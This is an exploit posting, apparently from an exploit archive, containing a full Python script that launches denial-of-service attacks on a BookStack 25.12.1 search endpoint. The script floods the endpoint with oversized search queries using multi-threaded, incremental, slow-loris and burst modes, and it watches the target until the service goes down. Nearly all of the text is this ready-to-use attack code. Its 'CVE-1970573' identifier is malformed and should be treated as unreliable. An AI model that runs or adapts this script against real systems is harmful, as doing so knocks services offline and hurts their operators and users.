Share
## https://sploitus.com/exploit?id=PACKETSTORM:223563
==================================================================================================================================
    | # Title     : BookStack 25.12.1 Denial of Service via Search Term Resource Exhaustion                                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://www.bookstackapp.com                                                                                     |
    ==================================================================================================================================
    
    [+] Summary    :  This script a denial of service condition against a BookStack search endpoint by generating extremely large search queries and sending them with high levels of concurrency.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import time
    import argparse
    import threading
    import urllib3
    from urllib.parse import quote
    from concurrent.futures import ThreadPoolExecutor, as_completed
    from datetime import datetime
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class BookStackDoS:
        def __init__(self, target_url, cookie=None, verbose=False):
            self.base_url = target_url.rstrip('/')
            self.cookie = cookie
            self.verbose = verbose
            self.search_url = f"{self.base_url}/search"
            self.stop_attack = threading.Event()
            self.session = requests.Session()
            if cookie:
                self.session.headers['Cookie'] = cookie
            self.request_count = 0
            self.error_count = 0
            self.lock = threading.Lock()
        def log(self, msg, level="INFO"):
            timestamp = datetime.now().strftime("%H:%M:%S")
            if level == "SUCCESS":
                print(f"\033[92m[{timestamp}] [+] {msg}\033[0m")
            elif level == "ERROR":
                print(f"\033[91m[{timestamp}] [-] {msg}\033[0m")
            elif level == "WARNING":
                print(f"\033[93m[{timestamp}] [!] {msg}\033[0m")
            elif level == "DEBUG" and self.verbose:
                print(f"\033[94m[{timestamp}] [*] {msg}\033[0m")
            else:
                print(f"\033[96m[{timestamp}] [*] {msg}\033[0m")
        def generate_search_payload(self, generic_terms=100, exact_terms=50, tag_terms=30):
            """Generate massive search payload to exhaust database"""
            generic = [f"t{i}" for i in range(generic_terms)]
            exact = [f"\"e{i}\"" for i in range(exact_terms)]
            tags = [f"[t{i}=v{i}]" for i in range(tag_terms)]
            all_terms = generic + exact + tags
            return " ".join(all_terms)
        def generate_max_payload(self):
            """Generate maximum size payload (most destructive)"""
            return self.generate_search_payload(200, 100, 50)
        def generate_moderate_payload(self):
            """Generate moderate payload (80% of max)"""
            return self.generate_search_payload(100, 50, 30)
        def generate_light_payload(self):
            """Generate light payload for testing"""
            return self.generate_search_payload(30, 15, 10)
        def get_search_term_count(self, payload):
            """Count number of search terms in payload"""
            return len(payload.split())
        def check_service_status(self):
            """Check if BookStack service is responding"""
            try:
                response = self.session.get(self.base_url, timeout=5)
                return response.status_code == 200
            except:
                return False
        def send_search_request(self, payload, timeout=30):
            """Send a single search request with the payload"""
            encoded_payload = quote(payload)
            url = f"{self.search_url}?term={encoded_payload}"
            try:
                response = self.session.get(url, timeout=timeout)
                with self.lock:
                    self.request_count += 1
                if self.verbose:
                    self.log(f"Request completed: HTTP {response.status_code}", "DEBUG")
                return response
            except requests.exceptions.Timeout:
                with self.lock:
                    self.error_count += 1
                self.log(f"Request timeout", "DEBUG")
                return None
            except Exception as e:
                with self.lock:
                    self.error_count += 1
                self.log(f"Request error: {e}", "DEBUG")
                return None
        def single_request_attack(self, payload_size="max"):
            """Simple single request attack"""
            if payload_size == "max":
                payload = self.generate_max_payload()
            elif payload_size == "moderate":
                payload = self.generate_moderate_payload()
            else:
                payload = self.generate_light_payload()
            term_count = self.get_search_term_count(payload)
            self.log(f"Sending single search request with {term_count} terms", "WARNING")
            self.log(f"Payload preview: {payload[:200]}...", "DEBUG")
            url_length = len(self.search_url) + len(payload) + 10
            self.log(f"Request URL length: {url_length} bytes")
            start_time = time.time()
            response = self.send_search_request(payload, timeout=60)
            elapsed = time.time() - start_time
            if response:
                self.log(f"Request completed in {elapsed:.2f}s with HTTP {response.status_code}")
            else:
                self.log(f"Request failed or timed out after {elapsed:.2f}s")
        def multi_thread_attack(self, threads=150, duration=30, payload_size="moderate"):
            """Multi-threaded attack to exhaust resources"""
            if payload_size == "max":
                payload = self.generate_max_payload()
            else:
                payload = self.generate_moderate_payload()
            term_count = self.get_search_term_count(payload)
            self.log(f"Starting multi-thread attack with {threads} threads for {duration}s")
            self.log(f"Each request contains {term_count} search terms")
            self.request_count = 0
            self.error_count = 0
            self.stop_attack.clear()
            def worker():
                while not self.stop_attack.is_set():
                    self.send_search_request(payload, timeout=30)
                    time.sleep(0.01)
            workers = []
            for _ in range(threads):
                t = threading.Thread(target=worker, daemon=True)
                t.start()
                workers.append(t)
            start_time = time.time()
            last_healthy_check = time.time()
            service_crashed = False
            while time.time() - start_time < duration:
                time.sleep(2)
                elapsed = int(time.time() - start_time)
                if time.time() - last_healthy_check >= 5:
                    if self.check_service_status():
                        self.log(f"[{elapsed}s] Service ONLINE - Requests: {self.request_count}, Errors: {self.error_count}")
                    else:
                        self.log(f"[{elapsed}s] Service OFFLINE! - DOS Successful!", "SUCCESS")
                        service_crashed = True
                        break
                    last_healthy_check = time.time()
                else:
                    self.log(f"[{elapsed}s] Attack ongoing - {self.request_count} requests sent", "INFO")
            self.stop_attack.set()
            for t in workers:
                t.join(timeout=2)
            self.log(f"Attack completed: {self.request_count} requests, {self.error_count} errors")
            time.sleep(5)
            if self.check_service_status():
                if service_crashed:
                    self.log("Service recovered after attack", "WARNING")
                else:
                    self.log("Service remained online throughout attack", "ERROR")
            else:
                self.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
        def incremental_attack(self, start_threads=10, max_threads=200, increment=20, duration_per_phase=10):
            """Gradually increase attack intensity to find threshold"""
            self.log("Starting incremental attack to find DoS threshold")
            self.log(f"Threads: {start_threads} -> {max_threads} (increment: {increment})")
            for threads in range(start_threads, max_threads + 1, increment):
                self.log(f"\n--- Phase: {threads} threads ---")
                payload = self.generate_moderate_payload()
                self.request_count = 0
                self.error_count = 0
                self.stop_attack.clear()
                workers = []
                for _ in range(threads):
                    t = threading.Thread(
                        target=self.send_search_request,
                        args=(payload,),
                        daemon=True
                    )
                    t.start()
                    workers.append(t)
                start_time = time.time()
                crashed = False
                while time.time() - start_time < duration_per_phase:
                    time.sleep(1)
                    if not self.check_service_status():
                        self.log(f"Service crashed at {threads} threads!", "SUCCESS")
                        crashed = True
                        break
                self.stop_attack.set()
                for t in workers:
                    t.join(timeout=1)
                if crashed:
                    self.log(f"DoS threshold found: {threads} threads")
                    break
                else:
                    self.log(f"Service survived {threads} threads")
                time.sleep(5)
        def slow_loris_attack(self, duration=60, interval=0.5):
            """Slow attack that gradually exhausts resources"""
            self.log(f"Starting Slow Loris style attack for {duration} seconds")
            payload = self.generate_moderate_payload()
            start_time = time.time()
            request_count = 0
            while time.time() - start_time < duration:
                # Send request with delay
                self.send_search_request(payload, timeout=10)
                request_count += 1
                if request_count % 10 == 0:
                    self.log(f"Sent {request_count} slow requests")
                if not self.check_service_status():
                    self.log("Service crashed during slow attack!", "SUCCESS")
                    break
                time.sleep(interval)
            self.log(f"Slow attack completed: {request_count} requests")
        def massive_burst_attack(self, burst_size=500):
            """Send massive burst of simultaneous requests"""
            self.log(f"Starting massive burst attack with {burst_size} simultaneous requests")
            payload = self.generate_moderate_payload()
            with ThreadPoolExecutor(max_workers=burst_size) as executor:
                futures = [executor.submit(self.send_search_request, payload) for _ in range(burst_size)]
                completed = 0
                for future in as_completed(futures):
                    completed += 1
                    if completed % 50 == 0:
                        self.log(f"Completed {completed}/{burst_size} requests")
            self.log(f"Burst completed: {self.request_count} successful, {self.error_count} errors")
            time.sleep(3)
            if self.check_service_status():
                self.log("Service survived burst attack", "WARNING")
            else:
                self.log("Service crashed from burst attack!", "SUCCESS")
    def banner():
        print("""
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘  BookStack 25.12.1 - Denial of Service (Search Term Exhaustion) โ•‘
    โ•‘  Resource Exhaustion via Massive Search Queries                 โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """)
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-1970573 - BookStack DoS via Search Term Resource Exhaustion"
        )
        parser.add_argument("-u", "--url", required=True, help="Target BookStack URL")
        parser.add_argument("-c", "--cookie", help="Cookie for authenticated requests")
        parser.add_argument("-t", "--threads", type=int, default=150, help="Number of threads (default: 150)")
        parser.add_argument("-d", "--duration", type=int, default=30, help="Attack duration in seconds (default: 30)")
        parser.add_argument("-m", "--mode", choices=["single", "multi", "incremental", "slow", "burst"], 
                            default="multi", help="Attack mode (default: multi)")
        parser.add_argument("-p", "--payload", choices=["light", "moderate", "max"], 
                            default="moderate", help="Payload size (default: moderate)")
        parser.add_argument("--monitor", action="store_true", help="Monitor service status only")
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        args = parser.parse_args()
        banner()
        exploit = BookStackDoS(args.url, args.cookie, args.verbose)
        if args.monitor:
            exploit.log("Monitoring service status...")
            while True:
                if exploit.check_service_status():
                    exploit.log("Service ONLINE")
                else:
                    exploit.log("Service OFFLINE", "ERROR")
                time.sleep(5)
            return
        if not exploit.check_service_status():
            exploit.log("Service is not responding. Check URL and network.", "ERROR")
            return
        exploit.log(f"Target: {args.url}")
        exploit.log(f"Service is ONLINE, starting attack...")
        if args.mode == "single":
            exploit.single_request_attack(args.payload)
        elif args.mode == "multi":
            threads = args.threads
            duration = args.duration
            exploit.multi_thread_attack(threads, duration, args.payload)
        elif args.mode == "incremental":
            exploit.incremental_attack()
        elif args.mode == "slow":
            exploit.slow_loris_attack(args.duration)
        elif args.mode == "burst":
            exploit.massive_burst_attack(args.threads)
        time.sleep(5)
        if exploit.check_service_status():
            exploit.log("Service still responding after attack", "WARNING")
        else:
            exploit.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print("\n[!] Interrupted by user")
            sys.exit(0)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================